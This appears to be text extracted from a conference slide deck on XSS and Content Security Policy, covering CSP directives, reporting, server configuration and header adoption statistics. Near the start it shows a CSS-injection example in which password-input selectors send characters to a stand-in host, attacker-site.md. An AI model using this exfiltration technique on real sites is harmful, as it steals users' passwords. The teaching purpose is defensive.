Information security monitoring analyst:
Igor Tarpan
Armed Forces of the Republic of Moldova
Networking
Server management
Security
Starlab
Information security engineer
Endava
Information security monitoring analyst
https://good-site.md/js/main.js
https://good-site.md/css/main.css
https://cdn.good-site.md/img/img/
http://attacker-site.md/xss/malicious.js
https://cdn.cloudflare.com/cache/
From top 15 vulnerability types reported on HackerOne, cross-site scripting (XSS, CWE-79) continued to be the most common vulnerability across all industries, with the exception of Healthcare and Technology.
input[type="password"][value$="A"] {
background-image: url("http://attacker-site.md:80085/A");
}
input[type="password"][value$="B"] {
background-image: url("http://attacker-site.md:80085/B");
}
input[type="password"][value$="C"] {
background-image: url("http://attacker-site.md:80085/C");
}
input[type="password"][value$="D"] {
background-image: url("http://attacker-site.md:80085/D");
}
input[type="password"][value$="E"] {
background-image: url("http://attacker-site.md:80085/E");
}
input[type="password"][value$="F"] {
background-image: url("http://attacker-site.md:80085/F");
}
input[type="password"][value$="G"] {
background-image: url("http://attacker-site.md:80085/G");
content-encoding: gzip
content-security-policy: default-src 'self' ; img-src 'self' data: https:; script-src 'self'
status: 200
strict-transport-security: max-age=31536000
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
Directive + Source type/Option ;
object-src
media-src
frame-src
child-src
plugin-types
report-uri
...
'none'
'self'
data: domain.example.com
*.example.com
'self'
https://report.report.ui
...
object-src
media-src
frame-src
child-src
plugin-types
report-uri
...
default-src
script-src
style-src
img-src
connect-src
font-src
Content-Security-Policy: default-src 'none'; img-src 'self' site-bucket.s3.amazonaws.com data: ; style-src 'self' https: ;
report-uri https://uri.good-site.md ;
Content-Security-Policy:default-src 'none';img-src 'self' site-bucket.s3.amazonaws.com data:;style-src 'self' https:;report-uri https://uri.good-site.md ;
Value | Example |
---|---|
* | img-src * |
'none' | style-src 'none' |
'self' | script-src 'self' |
data: | img-src 'self' data: |
domain.good-site.md | script-src domain.good-site.md |
*.good-site.md | script-src *.good-site.md |
https://domain.good-site.md | img-src https://domain.good-site.md |
https: | img-src https: |
'unsafe-inline' | script-src 'unsafe-eval' |
nonce-<value> | script-src 'nonce-580085' |
sha-256 | script-src 'sha256-qzn...ng=' |
Content-security-policy: default-src 'none'; report-uri https://report.good-site.md/report/;
Content-Security-Policy-Report-Only: default-src 'none'; report-uri https://report.good-site.md/report/;
{ "csp-report": { "document-uri": "http://example.com/signup.html", "referrer": "", "blocked-uri": "http://example.com/css/style.css", "violated-directive": "style-src cdn.example.com", "original-policy": "default-src 'none'; style-src cdn.example.com; report-uri /_/csp-reports", "disposition": "report" } }
Nginx
add_header Content-Security-Policy "default-src 'self';";
Apache
Header set Content-Security-Policy "default-src 'self';
HAproxy
http-response set-header Content-Security-Policy "default-src 'self' 'unsafe-inline' www.google-analytics.com"
Meta tag
<meta http-equiv="Content-Security-Policy" content="default-src https://cdn.example.net; child-src 'none'; object-src 'none'">
HPKP | 8136 | 0.86 % |
---|---|---|
HSTS | 120482 | 12.75 % |
X-XSS-Protection Header | 123817 | 13.10 % |
X-Frame-Options Header Header | 139548 | 14.77 % |
X Permitted Cross Domain Policies Header | 16692 | 1.80 % |
Content-Security-Policy (CSP) Header | 33153 | 3.51 % |
X-Content-Type-Options Header | 150949 | 15.94 % |
HPKP | 1 | 0.5 % |
---|---|---|
HSTS | 30 | 15 % |
X-XSS-Protection Header | 28 | 14 % |
X-Frame-Options Header Header | 36 | 18 % |
X Permitted Cross Domain Policies Header | 1 | 0.5 % |
Content-Security-Policy (CSP) Header | 3 | 1.5 % |
X-Content-Type-Options Header | 31 | 15.5 % |
Information security monitoring analyst:
Igor Tarpan